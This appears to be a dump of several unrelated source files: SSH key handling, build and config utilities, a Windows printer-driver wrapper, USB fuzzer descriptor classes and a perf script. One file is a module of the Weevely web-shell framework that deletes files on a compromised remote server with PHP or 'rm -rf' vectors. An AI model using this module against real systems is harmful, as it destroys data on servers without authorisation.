    elif data[0].startswith('-----'): # openssh key
        return getPrivateKeyObject_openssh(data, passphrase)
    elif data[0].startswith('ssh-'): # agent v3 private key
        return getPrivateKeyObject_agentv3(data, passphrase)
    else:
        raise BadKeyError('unknown private key type')
def getPrivateKeyObject_lsh(data, passphrase):
    """
    Build a key object from LSH private key data (an unencrypted
    S-expression).  C{passphrase} is accepted but ignored.

    @raises BadKeyError: if the S-expression holds an unknown key type.
    """
    #assert passphrase == ''
    data = ''.join(data)
    sexp = sexpy.parse(data)
    assert sexp[0] == 'private-key'
    kd = {}
    for name, data in sexp[1][1:]:
        # Round-trip each value through NS/getMP to decode it as a bignum.
        kd[name] = common.getMP(common.NS(data))[0]
    if sexp[1][0] == 'dsa':
        assert len(kd) == 5, len(kd)
        return DSA.construct((kd['y'], kd['g'], kd['p'], kd['q'], kd['x']))
    elif sexp[1][0] == 'rsa-pkcs1':
        # The sexp also carries CRT parameters; only n,e,d,p,q are used.
        assert len(kd) == 8, len(kd)
        return RSA.construct((kd['n'], kd['e'], kd['d'], kd['p'], kd['q']))
    else:
        raise BadKeyError('unknown lsh key type %s' % sexp[1][0])
def getPrivateKeyObject_openssh(data, passphrase):
    """
    Build a key object from a PEM-style OpenSSH private key, given as a
    list of lines.  Supports DES-EDE3-CBC encrypted keys via the classic
    MD5-based OpenSSL key derivation.

    NOTE(review): an unrecognized kind falls through and returns None
    rather than raising -- presumably callers never hit this; confirm.
    """
    # 'RSA' or 'DSA', sliced out of '-----BEGIN RSA PRIVATE KEY-----'.
    kind = data[0][11: 14]
    if data[1].startswith('Proc-Type: 4,ENCRYPTED'): # encrypted key
        # The DEK-Info header carries the hex IV after the comma.
        ivdata = data[2].split(',')[1][:-1]
        iv = ''.join([chr(int(ivdata[i:i+2],16)) for i in range(0, len(ivdata), 2)])
        if not passphrase:
            raise BadKeyError, 'encrypted key with no passphrase'
        # OpenSSL EVP_BytesToKey with MD5: derive 24 bytes of 3DES key.
        ba = md5.new(passphrase + iv).digest()
        bb = md5.new(ba + passphrase + iv).digest()
        decKey = (ba + bb)[:24]
        b64Data = base64.decodestring(''.join(data[4:-1]))
        keyData = DES3.new(decKey, DES3.MODE_CBC, iv).decrypt(b64Data)
        # Strip PKCS#7-style padding: last byte is the pad length.
        removeLen = ord(keyData[-1])
        keyData = keyData[:-removeLen]
    else:
        keyData = base64.decodestring(''.join(data[1:-1]))
    try:
        decodedKey = asn1.parse(keyData)
    except Exception, e:
        raise BadKeyError, 'something wrong with decode'
    if type(decodedKey[0]) == type([]):
        decodedKey = decodedKey[0] # this happens with encrypted keys
    if kind == 'RSA':
        n,e,d,p,q=decodedKey[1:6]
        return RSA.construct((n,e,d,p,q))
    elif kind == 'DSA':
        p, q, g, y, x = decodedKey[1: 6]
        return DSA.construct((y, g, p, q, x))
def getPrivateKeyObject_agentv3(data, passphrase):
    """
    Build a key object from SSH agent v3 private key data.  Agent v3 keys
    are never encrypted, so any passphrase is an error.

    @raises BadKeyError: if a passphrase is given or the type is unknown.
    """
    if passphrase:
        raise BadKeyError("agent v3 key should not be encrypted")
    keyType, data = common.getNS(data)
    if keyType == 'ssh-dss':
        p, data = common.getMP(data)
        q, data = common.getMP(data)
        g, data = common.getMP(data)
        y, data = common.getMP(data)
        x, data = common.getMP(data)
        return DSA.construct((y,g,p,q,x))
    elif keyType == 'ssh-rsa':
        # Agent order is e, d, n, u, p, q.
        e, data = common.getMP(data)
        d, data = common.getMP(data)
        n, data = common.getMP(data)
        u, data = common.getMP(data)
        p, data = common.getMP(data)
        q, data = common.getMP(data)
        return RSA.construct((n,e,d,p,q,u))
    else:
        raise BadKeyError("unknown key type %s" % keyType)
def makePrivateKeyString(obj, passphrase = None, kind = 'openssh'):
    """
    Return an OpenSSH-style private key for a
    C{Crypto.PublicKey.pubkey.pubkey} object. If passphrase is given, encrypt
    the private key with it.
    kind is one of ('openssh', 'lsh', 'agentv3')

    Note that only the 'openssh' format supports encryption; the other
    serializers raise BadKeyError when a passphrase is supplied.

    @type obj: C{Crypto.PublicKey.pubkey.pubkey}
    @type passphrase: C{str}/C{None}
    @type kind: C{str}
    @rtype: C{str}
    @raises BadKeyError: if C{kind} is not a recognized format name.
    """
    if kind == 'lsh':
        return makePrivateKeyString_lsh(obj, passphrase)
    elif kind == 'openssh':
        return makePrivateKeyString_openssh(obj, passphrase)
    elif kind == 'agentv3':
        return makePrivateKeyString_agentv3(obj, passphrase)
    else:
        raise BadKeyError('bad kind %s' % kind)
def makePrivateKeyString_lsh(obj, passphrase):
    """
    Serialize a private key as an LSH S-expression.  LSH keys cannot be
    encrypted, so a truthy passphrase is rejected.

    @raises BadKeyError: if a passphrase is given or the type is unknown.
    """
    if passphrase:
        raise BadKeyError("cannot encrypt to lsh format")
    keyType = objectType(obj)
    if keyType == 'ssh-rsa':
        # The format wants p < q; swap if necessary.
        p,q=obj.p,obj.q
        if p > q:
            (p,q)=(q,p)
        # 'a', 'b', 'c' are the CRT exponents and coefficient
        # (d mod q-1, d mod p-1, p^-1 mod q after the swap above).
        return sexpy.pack([['private-key', ['rsa-pkcs1',
                                            ['n', common.MP(obj.n)[4:]],
                                            ['e', common.MP(obj.e)[4:]],
                                            ['d', common.MP(obj.d)[4:]],
                                            ['p', common.MP(q)[4:]],
                                            ['q', common.MP(p)[4:]],
                                            ['a', common.MP(obj.d%(q-1))[4:]],
                                            ['b', common.MP(obj.d%(p-1))[4:]],
                                            ['c', common.MP(Util.number.inverse(p, q))[4:]]]]])
    elif keyType == 'ssh-dss':
        return sexpy.pack([['private-key', ['dsa',
                                            ['p', common.MP(obj.p)[4:]],
                                            ['q', common.MP(obj.q)[4:]],
                                            ['g', common.MP(obj.g)[4:]],
                                            ['y', common.MP(obj.y)[4:]],
                                            ['x', common.MP(obj.x)[4:]]]]])
    else:
        raise BadKeyError('bad keyType %s' % keyType)
def makePrivateKeyString_openssh(obj, passphrase):
    """
    Serialize a private key as a PEM-style OpenSSH private key.  When a
    passphrase is given, the ASN.1 body is 3DES-CBC encrypted using the
    classic MD5-based OpenSSL key derivation, and the matching
    Proc-Type/DEK-Info headers are emitted.

    @raises BadKeyError: if the key type is unknown.
    """
    keyType = objectType(obj)
    if keyType == 'ssh-rsa':
        keyData = '-----BEGIN RSA PRIVATE KEY-----\n'
        p,q=obj.p,obj.q
        if p > q:
            (p,q) = (q,p)
        # p is less than q
        # PKCS#1 RSAPrivateKey order: version, n, e, d, p, q, dP, dQ, qInv.
        objData = [0, obj.n, obj.e, obj.d, q, p, obj.d%(q-1), obj.d%(p-1),Util.number.inverse(p, q)]
    elif keyType == 'ssh-dss':
        keyData = '-----BEGIN DSA PRIVATE KEY-----\n'
        objData = [0, obj.p, obj.q, obj.g, obj.y, obj.x]
    else:
        raise BadKeyError('unknown key type %s' % keyType)
    if passphrase:
        iv = common.entropy.get_bytes(8)
        hexiv = ''.join(['%02X' % ord(x) for x in iv])
        keyData += 'Proc-Type: 4,ENCRYPTED\n'
        keyData += 'DEK-Info: DES-EDE3-CBC,%s\n\n' % hexiv
        # EVP_BytesToKey with MD5: derive 24 bytes of 3DES key material.
        ba = md5.new(passphrase + iv).digest()
        bb = md5.new(ba + passphrase + iv).digest()
        encKey = (ba + bb)[:24]
    asn1Data = asn1.pack([objData])
    if passphrase:
        # Pad to the 8-byte 3DES block size (PKCS#7-style padding).
        padLen = 8 - (len(asn1Data) % 8)
        asn1Data += (chr(padLen) * padLen)
        asn1Data = DES3.new(encKey, DES3.MODE_CBC, iv).encrypt(asn1Data)
    # Re-wrap the base64 body at the PEM-conventional 64 columns.
    b64Data = base64.encodestring(asn1Data).replace('\n','')
    b64Data = '\n'.join([b64Data[i:i+64] for i in range(0,len(b64Data),64)])
    keyData += b64Data + '\n'
    if keyType == 'ssh-rsa':
        keyData += '-----END RSA PRIVATE KEY-----'
    elif keyType == 'ssh-dss':
        keyData += '-----END DSA PRIVATE KEY-----'
    return keyData
def makePrivateKeyString_agentv3(obj, passphrase):
    """
    Serialize a private key as an SSH agent v3 blob: NS(type) followed by
    the key's numbers as MP integers.  Agent v3 keys cannot be encrypted,
    so a truthy passphrase is rejected.

    @type obj: C{Crypto.PublicKey.pubkey.pubkey}
    @type passphrase: C{str}/C{None}
    @rtype: C{str}
    @raises BadKeyError: if a passphrase is given or the type is unknown.
    """
    if passphrase:
        raise BadKeyError("cannot encrypt to agent v3 format")
    keyType = objectType(obj)
    if keyType == 'ssh-rsa':
        values = (obj.e, obj.d, obj.n, obj.u, obj.p, obj.q)
    elif keyType == 'ssh-dss':
        values = (obj.p, obj.q, obj.g, obj.y, obj.x)
    else:
        # Mirror the other serializers: fail loudly instead of hitting an
        # unbound 'values' below.
        raise BadKeyError('unknown key type %s' % keyType)
    # Bug fix: this previously read 'keytype', which was a NameError;
    # the local variable is 'keyType'.
    return common.NS(keyType) + ''.join(map(common.MP, values))
def makePublicKeyBlob(obj):
    """
    Return the SSHv2 wire-format public key blob for a
    C{Crypto.PublicKey.pubkey.pubkey} object.

    @type obj: C{Crypto.PublicKey.pubkey.pubkey}
    @rtype: C{str}
    @raises BadKeyError: if the key type is unknown.
    """
    keyType = objectType(obj)
    if keyType == 'ssh-rsa':
        keyData = common.MP(obj.e) + common.MP(obj.n)
    elif keyType == 'ssh-dss':
        keyData = common.MP(obj.p)
        keyData += common.MP(obj.q)
        keyData += common.MP(obj.g)
        keyData += common.MP(obj.y)
    else:
        # Bug fix: an unknown type previously fell through and raised
        # UnboundLocalError on 'keyData'; raise a meaningful error instead
        # (matching makePublicKeyString_openssh).
        raise BadKeyError('unknown key type %s' % keyType)
    return common.NS(keyType)+keyData
def makePrivateKeyBlob(obj):
    """
    Return the SSHv2 wire-format private key blob for a
    C{Crypto.PublicKey.pubkey.pubkey} object: NS(type) followed by the
    key's numbers as MP integers.

    @raises ValueError: if the key type is unknown.
    """
    keyType = objectType(obj)
    if keyType == 'ssh-rsa':
        return common.NS(keyType) + common.MP(obj.n) + common.MP(obj.e) + \
               common.MP(obj.d) + common.MP(obj.u) + common.MP(obj.q) + \
               common.MP(obj.p)
    elif keyType == 'ssh-dss':
        return common.NS(keyType) + common.MP(obj.p) + common.MP(obj.q) + \
               common.MP(obj.g) + common.MP(obj.y) + common.MP(obj.x)
    else:
        raise ValueError('trying to get blob for invalid key type: %s' % keyType)
def objectType(obj):
    """
    Return the SSH key type corresponding to a C{Crypto.PublicKey.pubkey.pubkey}
    object.

    @type obj: C{Crypto.PublicKey.pubkey.pubkey}
    @rtype: C{str}
    @raises KeyError: if the object's keydata tuple matches no known type.
    """
    # PyCrypto key objects expose the ordered names of their parameters in
    # 'keydata'; that tuple identifies the key type.
    keyDataMapping = {
        ('n', 'e', 'd', 'p', 'q'): 'ssh-rsa',
        ('n', 'e', 'd', 'p', 'q', 'u'): 'ssh-rsa',
        ('y', 'g', 'p', 'q', 'x'): 'ssh-dss'
    }
    return keyDataMapping[tuple(obj.keydata)]
def pkcs1Pad(data, lMod):
    """
    PKCS#1 v1.5 type-1 pad C{data} out to C{lMod} bytes: a 0x01 marker,
    then 0xff filler, then a 0x00 separator, then the payload.
    """
    padding = '\xff' * (lMod - 2 - len(data))
    return '\x01' + padding + '\x00' + data
def pkcs1Digest(data, lMod):
    """
    SHA-1 hash C{data}, prefix the digest with the ASN.1 SHA-1 algorithm
    identifier (ID_SHA1), and PKCS#1-pad the result out to C{lMod} bytes.
    """
    digest = sha.new(data).digest()
    return pkcs1Pad(ID_SHA1+digest, lMod)
def lenSig(obj):
    """
    Return the signature length in bytes for the key C{obj}: its size in
    bits divided by eight.
    """
    return obj.size() / 8
def signData(obj, data):
    """
    Sign the data with the given C{Crypto.PublicKey.pubkey.pubkey} object.

    Returns NS(type) followed by the type-specific signature blob.

    @type obj: C{Crypto.PublicKey.pubkey.pubkey}
    @type data: C{str}
    @rtype: C{str}
    """
    # Dispatch on key type to the per-algorithm signing helper.
    mapping = {
        'ssh-rsa': signData_rsa,
        'ssh-dss': signData_dsa
    }
    objType = objectType(obj)
    return common.NS(objType)+mapping[objType](obj, data)
def signData_rsa(obj, data):
    """
    RSA-sign C{data}: PKCS#1-pad the SHA-1 digest to the key's modulus
    length, sign it, and return the signature as a length-prefixed string.
    """
    sigData = pkcs1Digest(data, lenSig(obj))
    sig = obj.sign(sigData, '')[0]
    return common.NS(Util.number.long_to_bytes(sig)) # get around adding the \x00 byte
def signData_dsa(obj, data):
    """
    DSA-sign the SHA-1 digest of C{data} and return the signature in the
    SSH wire format (r and s fixed at 20 bytes each).
    """
    sigData = sha.new(data).digest()
    # DSA signing needs a fresh random k for every signature.
    randData = common.entropy.get_bytes(19)
    sig = obj.sign(sigData, randData)
    # SSH insists that the DSS signature blob be two 160-bit integers
    # concatenated together. The sig[0], [1] numbers from obj.sign are just
    # numbers, and could be any length from 0 to 160 bits. Make sure they
    # are padded out to 160 bits (20 bytes each)
    return common.NS(Util.number.long_to_bytes(sig[0], 20) +
                     Util.number.long_to_bytes(sig[1], 20))
def verifySignature(obj, sig, data):
    """
    Verify that the signature for the data is valid.

    C{sig} is the full SSH signature blob: NS(type) + signature data.

    @type obj: C{Crypto.PublicKey.pubkey.pubkey}
    @type sig: C{str}
    @type data: C{str}
    @rtype: C{bool}
    """
    mapping = {
        'ssh-rsa': verifySignature_rsa,
        'ssh-dss': verifySignature_dsa,
    }
    objType = objectType(obj)
    sigType, sigData = common.getNS(sig)
    if objType != sigType: # object and signature are not of same type
        return 0
    return mapping[objType](obj, sigData, data)
def verifySignature_rsa(obj, sig, data):
    """
    Verify an RSA signature: recompute the PKCS#1-padded SHA-1 digest of
    C{data} and check it against the signature integer.
    """
    sigTuple = [common.getMP(sig)[0]]
    return obj.verify(pkcs1Digest(data, lenSig(obj)), sigTuple)
def verifySignature_dsa(obj, sig, data):
    """
    Verify a DSA signature: split the 40-byte blob into the two 20-byte
    integers r and s and check them against the SHA-1 digest of C{data}.
    """
    sig = common.getNS(sig)[0]
    assert(len(sig) == 40)
    l = len(sig)/2
    sigTuple = map(Util.number.bytes_to_long, [sig[: l], sig[l:]])
    return obj.verify(sha.new(data).digest(), sigTuple)
def printKey(obj):
    """
    Pretty print a C{Crypto.PublicKey.pubkey.pubkey} object: a header line
    with type/kind/size, then each key parameter as colon-separated hex,
    15 bytes per row.

    @type obj: C{Crypto.PublicKey.pubkey.pubkey}
    """
    print '%s %s (%s bits)'%(objectType(obj),
                             obj.hasprivate()and 'Private Key'or 'Public Key',
                             obj.size())
    for k in obj.keydata:
        if hasattr(obj, k):
            print 'attr', k
            # MP()[4:] strips the 4-byte length prefix, leaving raw bytes.
            by = common.MP(getattr(obj, k))[4:]
            while by:
                m = by[: 15]
                by = by[15:]
                o = ''
                for c in m:
                    o = o+'%02x:'%ord(c)
                if len(m) < 15:
                    # Drop the trailing ':' on the final (short) row.
                    o = o[:-1]
                print '\t'+o
ID_SHA1 = '\x30\x21\x30\x09\x06\x05\x2b\x0e\x03\x02\x1a\x05\x00\x04\x14'
| gpl-3.0 |
vinutah/apps | tools/llvm/llvm_39/opt/utils/llvm-build/llvmbuild/configutil.py | 121 | 2084 | """
Defines utilities useful for performing standard "configuration" style tasks.
"""
import re
import os
def configure_file(input_path, output_path, substitutions):
    """configure_file(input_path, output_path, substitutions) -> bool

    Given an input and output path, "configure" the file at the given input path
    by replacing variables in the file with those given in the substitutions
    list. Returns true if the output file was written.

    The substitutions list should be given as a list of tuples (regex string,
    replacement), where the regex and replacement will be used as in 're.sub' to
    execute the variable replacement.

    The output path's parent directory need not exist (it will be created).

    If the output path does exist and the configured data is not different than
    it's current contents, the output file will not be modified. This is
    designed to limit the impact of configured files on build dependencies.
    """
    # Read in the input data.
    f = open(input_path, "rb")
    try:
        data = f.read()
    finally:
        f.close()

    # Perform the substitutions.
    for regex_string, replacement in substitutions:
        regex = re.compile(regex_string)
        data = regex.sub(replacement, data)

    # Ensure the output parent directory exists.
    output_parent_path = os.path.dirname(os.path.abspath(output_path))
    if not os.path.exists(output_parent_path):
        os.makedirs(output_parent_path)

    # If the output path already holds the configured contents, skip the
    # write so build-system timestamps stay untouched.
    if os.path.exists(output_path):
        try:
            # Fix: the old code used bare 'except:' clauses (which swallow
            # KeyboardInterrupt/SystemExit) and could leak the handle if
            # read() failed; catch only I/O errors and always close.
            f = open(output_path, "rb")
            try:
                current_data = f.read()
            finally:
                f.close()
        except EnvironmentError:
            # Unreadable or racing file: fall through and rewrite it.
            current_data = None
        if current_data is not None and current_data == data:
            return False

    # Write the output contents.
    f = open(output_path, "wb")
    try:
        f.write(data)
    finally:
        f.close()
    return True
| gpl-3.0 |
mahinthjoe/bedrock | bedrock/thunderbird/views.py | 17 | 1073 | # -*- coding: utf-8 -*-
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
from lib import l10n_utils
from bedrock.thunderbird.details import thunderbird_desktop
from lib.l10n_utils.dotlang import _
def all_downloads(request, channel):
    """Render the Thunderbird "all downloads" page for a release channel.

    A missing channel (None) defaults to 'release', and the public
    channel name 'earlybird' maps to the internal 'alpha' channel.
    """
    # Normalize the URL channel segment to an internal channel name.
    if channel is None:
        channel = 'release'
    if channel == 'earlybird':
        channel = 'alpha'

    channel_names = {
        'release': _('Thunderbird'),
        'beta': _('Thunderbird Beta'),
        'alpha': _('Earlybird'),
    }

    version = thunderbird_desktop.latest_version(channel)
    query = request.GET.get('q')
    builds = thunderbird_desktop.get_filtered_full_builds(channel, version, query)

    context = {
        # Only the major version number is displayed on the page.
        'full_builds_version': version.split('.', 1)[0],
        'full_builds': builds,
        'query': query,
        'channel': channel,
        'channel_name': channel_names[channel]
    }
    return l10n_utils.render(request, 'thunderbird/all.html', context)
| mpl-2.0 |
JeyZeta/Dangerous | Dangerous/Weevely/modules/file/rm.py | 3 | 2814 |
from core.moduleguess import ModuleGuess
from core.moduleexception import ModuleException, ProbeSucceed, ProbeException, ExecutionException
from core.argparse import ArgumentParser
WARN_NO_SUCH_FILE = 'No such file or permission denied'
WARN_DELETE_FAIL = 'Cannot remove, check permission or recursion'
WARN_DELETE_OK = 'File deleted'
class Rm(ModuleGuess):
    '''Remove remote files and folders'''

    def _set_vectors(self):
        # Two interchangeable deletion vectors: a PHP implementation (works
        # when only PHP execution is available) and a plain shell 'rm'.
        # In the PHP vector, $recursive/$rpath are substituted in by the
        # framework before execution; rrmdir() recurses when $recurs == "1".
        self.vectors.add_vector('php_rmdir', 'shell.php', """
function rmfile($dir) {
if (is_dir("$dir")) rmdir("$dir");
else { unlink("$dir"); }
}
function exists($path) {
return (file_exists("$path") || is_link("$path"));
}
function rrmdir($recurs,$dir) {
if($recurs=="1") {
if (is_dir("$dir")) {
$objects = scandir("$dir");
foreach ($objects as $object) {
if ($object != "." && $object != "..") {
if (filetype($dir."/".$object) == "dir") rrmdir($recurs, $dir."/".$object); else unlink($dir."/".$object);
}
}
reset($objects);
rmdir("$dir");
}
else rmfile("$dir");
}
else rmfile("$dir");
}
$recurs="$recursive"; $path="$rpath";
if(exists("$path"))
rrmdir("$recurs", "$path");""")
        self.vectors.add_vector('rm', 'shell.sh', "rm $recursive $rpath")

    def _set_args(self):
        self.argparser.add_argument('rpath', help='Remote starting path')
        self.argparser.add_argument('-recursive', help='Remove recursively', action='store_true')
        self.argparser.add_argument('-vector', choices = self.vectors.keys())

    def _prepare(self):
        # Fail fast if the target does not exist (or is not visible).
        self._result = False
        self.modhandler.load('file.check').run([ self.args['rpath'], 'exists' ])
        if not self.modhandler.load('file.check')._result:
            raise ProbeException(self.name, WARN_NO_SUCH_FILE)

    def _prepare_vector(self):
        # Translate the boolean 'recursive' flag into the form each vector
        # expects: '-rf' for shell rm, "1"/"" for the PHP implementation.
        self.formatted_args = { 'rpath' : self.args['rpath'] }
        if self.current_vector.name == 'rm':
            self.formatted_args['recursive'] = '-rf' if self.args['recursive'] else ''
        else:
            self.formatted_args['recursive'] = '1' if self.args['recursive'] else ''

    def _verify_vector_execution(self):
        # Success is detected by the target no longer existing.
        self.modhandler.load('file.check').run([ self.args['rpath'], 'exists' ])
        result = self.modhandler.load('file.check')._result
        if result == False:
            self._result = True
            raise ProbeSucceed(self.name, WARN_DELETE_OK)

    def _verify(self):
        # Reached only when no vector managed to delete the target.
        raise ProbeException(self.name, WARN_DELETE_FAIL)
def _stringify_result(self):
self._output = '' | mit |
meng89/wpi | wpi/driver.py | 1 | 1345 | from win32com.client import GetObject
import hooky
_OBJ_NAME = 'Win32_PrinterDriver'
B32 = 'Windows NT x86'
B64 = 'Windows x64'
class Drivers(hooky.Dict):
    """Mapping-like view of the printer drivers installed on Windows.

    Keys are tuples built by splitting the WMI driver name on its last two
    commas, typically ``(name, environment, version)``.
    """

    def __init__(self):
        super().__init__()
        # WMI class object, used both for enumeration and for the
        # AddPrinterDriver method call.
        self._Driver = GetObject('winmgmts:/root/cimv2').Get('Win32_PrinterDriver')

    def __iter__(self):
        for instance in self._Driver.instances_():
            yield tuple(instance.name.rsplit(',', 2))

    def __setitem__(self, key, value):
        raise TypeError('not support this yet!')

    def add_by_inf(self, inf_path, name, platform=None):
        """Install a printer driver from an .inf file.

        :param inf_path: path to the driver .inf file (required).
        :param name: driver name as declared in the .inf.
        :param platform: target environment (B32/B64); when ``None`` the
            OS's own platform is used.
        """
        if inf_path is None:
            raise ValueError
        self._Driver.Name = name
        self._Driver.InfName = inf_path
        # default is os platform
        if platform is not None:
            self._Driver.SupportedPlatform = platform
        method = self._Driver.Methods_('AddPrinterDriver')
        in_parms = method.InParameters
        in_parms.DriverInfo = self._Driver
        self._Driver.ExecMethod_('AddPrinterDriver', in_parms)

    def __delitem__(self, key):
        wmi = GetObject('winmgmts:/root/cimv2')
        drivers = wmi.InstancesOf(_OBJ_NAME)
        for driver in drivers:
            # BUG FIX: rsplit() returns a list, but __iter__ yields tuples,
            # so the original `key == driver.name.rsplit(',', 2)` could never
            # match a tuple key.  Normalise both sides to tuples.
            if tuple(key) == tuple(driver.name.rsplit(',', 2)):
                driver.Delete_()
                return
        raise Exception
if __name__ == '__main__':
    # No demo/CLI behaviour; the module is import-only.
    pass
| lgpl-3.0 |
rpwagner/tiled-display | flTile/configs/localTestLargeConfig.py | 1 | 1310 | import sys, os
sys.path = [os.path.join(os.getcwd(), "..") ] + sys.path
from tileConfig import TileConfig, TileDesc, MachineDesc, SaveConfig, LoadConfig, TileLocation, Rect, LocalWindow
def CreateLocalTestConfig():
    # Build a 2x2 grid of 400x400 tiles, all on display ":0" and all sharing
    # local window 0.  t1 and t3 are positioned relative to the tile on
    # their left; t2 relative to the tile above it.
    c = TileConfig()
    t0 = TileDesc( (400, 400), (0,0), ":0", localWindowId=0)
    t1 = TileDesc( (400, 400), (400, 0), ":0", lrtbMullions=(0,0,0,0), location=TileLocation( (400,0), relative=t0.uid), localWindowId=0)
    print "t1 relative:", t1.location.relative
    t2 = TileDesc( (400, 400), (0,400), ":0", localWindowId=0, location=TileLocation( (0,400), relative=t0.uid))
    t3 = TileDesc( (400, 400), (400, 400), ":0", lrtbMullions=(0,0,0,0), location=TileLocation( (400,0), relative=t2.uid), localWindowId=0)
    # One 800x800 local window covers the whole mosaic on host "maze".
    localWindow = LocalWindow(Rect(0,0,800,800))
    m3 = MachineDesc( "maze", tiles = [t0, t1, t2, t3], windows=[localWindow])
    c.addMachine(m3)
    return c
if __name__ == "__main__":
    # Round-trip self test: save the config, reload it, and verify the
    # reread copy compares equal to the original.
    c = CreateLocalTestConfig()
    SaveConfig(c, "/tmp/testconfig")
    print c.asDict()
    c2 = LoadConfig("/tmp/testconfig")
    if c == c2:
        print "PASS: Saved and reread config matched original."
    else:
        print "FAIL: Saved and reread config did not match original. Saving as testconfig2 for comparison"
        SaveConfig(c2, "/tmp/testconfig2")
| apache-2.0 |
nccgroup/umap2 | umap2/core/usb_device_capability.py | 1 | 4279 | '''
Device capabilities
As defined in USB 3.1 spec, section 9.6.2
'''
import struct
from umap2.core.usb import DescriptorType
from umap2.core.usb_base import USBBaseActor
from umap2.fuzz.helpers import mutable
class USBDeviceCapability(USBBaseActor):
    # Device capability type codes (USB 3.1 spec, section 9.6.2).
    WIRELESS_USB = 0x01
    USB_20_EXTENSION = 0x02
    SUPERSPEED_USB = 0x03
    CONTAINER_ID = 0x04
    PLATFORM = 0x05
    POWER_DELIVERY_CAPABILITY = 0x06
    BATTERY_INFO_CAPABILITY = 0x07
    PD_CONSUMER_PORT_CAPABILITY = 0x08
    PD_PROVIDER_PORT_CAPABILITY = 0x09
    SUPERSPEED_PLUS = 0x0A
    PRECISION_TIME_MEASUREMENT = 0x0B
    WIRELESS_USB_EXT = 0x0C
    def __init__(self, app, phy, cap_type, data):
        '''
        :param app: Umap2 application
        :param phy: Physical connection
        :param cap_type: Capability type (one of the codes above)
        :param data: the capability data (string)
        '''
        super(USBDeviceCapability, self).__init__(app, phy)
        self.cap_type = cap_type
        self.cap_data = data
    @mutable('device_capability_descriptor')
    def get_descriptor(self, usb_type='fullspeed', valid=False):
        # Layout: bLength, bDescriptorType, bDevCapabilityType, then the
        # capability-specific data supplied by the subclass.
        bDescriptorType = DescriptorType.device_capability
        bLength = 3 + len(self.cap_data)
        d = struct.pack(
            '<BBB',
            bLength,
            bDescriptorType,
            self.cap_type
        )
        return d + self.cap_data
#
# Specific device capability classes
#
class DCUsb20Extension(USBDeviceCapability):
    """USB 2.0 Extension device capability (USB 3.1 spec, section 9.6.2.1)."""
    # bmAttributes flag values.
    ATTR_LPM = 0x00000002
    ATTR_NONE = 0x00000000

    def __init__(self, app, phy, attributes=ATTR_NONE):
        # bmAttributes is a single 32-bit little-endian field.
        packed = struct.pack('<I', attributes)
        super(DCUsb20Extension, self).__init__(
            app, phy, self.USB_20_EXTENSION, packed)
        self.attributes = attributes
class DCSuperspeedUsb(USBDeviceCapability):
    '''
    Superspeed USB capability is defined in USB 3.1 spec, section 9.6.2.2
    '''
    def __init__(self, app, phy, attributes, speeds_supported, functionality_support, u1dev_exit_lat, u2dev_exit_lat):
        # Little-endian fields: bmAttributes (B), wSpeedsSupported (H),
        # bFunctionalitySupport (B), bU1DevExitLat (B), wU2DevExitLat (H).
        data = struct.pack('<BHBBH', attributes, speeds_supported, functionality_support, u1dev_exit_lat, u2dev_exit_lat)
        super(DCSuperspeedUsb, self).__init__(app, phy, self.SUPERSPEED_USB, data)
        self.attributes = attributes
        self.speeds_supported = speeds_supported
        self.functionality_support = functionality_support
        self.u1dev_exit_lat = u1dev_exit_lat
        self.u2dev_exit_lat = u2dev_exit_lat
class DCContainerId(USBDeviceCapability):
    """Container ID device capability (USB 3.1 spec, section 9.6.2.3)."""

    def __init__(self, app, phy, container_id):
        # One reserved byte precedes the container UUID bytes.
        payload = b'\x00' + container_id
        super(DCContainerId, self).__init__(
            app, phy, self.CONTAINER_ID, payload)
        self.container_id = container_id
class DCPlatform(USBDeviceCapability):
    '''
    Platform capability is defined in USB 3.1 spec, section 9.6.2.4
    '''
    def __init__(self, app, phy, platform_capability_uuid, capability_data=b''):
        # One reserved byte, the platform capability UUID bytes, then
        # arbitrary capability-specific data.
        data = b'\x00' + platform_capability_uuid + capability_data
        super(DCPlatform, self).__init__(app, phy, self.PLATFORM, data)
        self.platform_capability_uuid = platform_capability_uuid
        self.capability_data = capability_data
class DCSuperspeedPlusUsb(USBDeviceCapability):
    '''
    Superspeed Plus USB capability is defined in USB 3.1 spec, section 9.6.2.5
    '''
    def __init__(self, app, phy, attributes, functionality_support, sublink_speed_attributes):
        # Packs a reserved byte (0), bmAttributes (I), a zero halfword, and
        # functionality_support (H), then one 32-bit sublink speed attribute
        # per list entry.
        # NOTE(review): the spec lists wFunctionalitySupport before the
        # reserved halfword; here the zero is packed first -- confirm whether
        # this ordering is intentional (umap2 is a fuzzer).
        data = struct.pack('<BIHH', 0, attributes, 0, functionality_support)
        for sls_attr in sublink_speed_attributes:
            data += struct.pack('<I', sls_attr)
        super(DCSuperspeedPlusUsb, self).__init__(app, phy, self.SUPERSPEED_PLUS, data)
        self.attributes = attributes
        self.functionality_support = functionality_support
        self.sublink_speed_attributes = sublink_speed_attributes
class DCPrecisionTimeMeasurement(USBDeviceCapability):
    """Precision Time Measurement capability (USB 3.1 spec, section 9.6.2.6)."""

    def __init__(self, app, phy):
        # PTM carries no capability-specific payload.
        super(DCPrecisionTimeMeasurement, self).__init__(
            app, phy, self.PRECISION_TIME_MEASUREMENT, b'')
| agpl-3.0 |
pocketbook-free/kernel_622 | tools/perf/scripts/python/syscall-counts.py | 944 | 1429 | # system call counts
# (c) 2010, Tom Zanussi <tzanussi@gmail.com>
# Licensed under the terms of the GNU GPL License version 2
#
# Displays system-wide system call totals, broken down by syscall.
# If a [comm] arg is specified, only syscalls called by [comm] are displayed.
import os
import sys
sys.path.append(os.environ['PERF_EXEC_PATH'] + \
'/scripts/python/Perf-Trace-Util/lib/Perf/Trace')
from perf_trace_context import *
from Core import *
usage = "perf trace -s syscall-counts.py [comm]\n";
# Optional single argument restricts counting to one command name.
for_comm = None
if len(sys.argv) > 2:
    sys.exit(usage)
if len(sys.argv) > 1:
    for_comm = sys.argv[1]
# syscall id -> number of invocations seen.
syscalls = autodict()
def trace_begin():
    # Nothing to set up; counting happens per-event.
    pass
def trace_end():
    # Called by perf when the trace finishes; emit the summary table.
    print_syscall_totals()
def raw_syscalls__sys_enter(event_name, context, common_cpu,
        common_secs, common_nsecs, common_pid, common_comm,
        id, args):
    # Per-event hook: count one sys_enter, optionally filtered by command.
    if for_comm is not None:
        if common_comm != for_comm:
            return
    try:
        syscalls[id] += 1
    except TypeError:
        # First hit for this syscall id: initialise the counter.
        syscalls[id] = 1
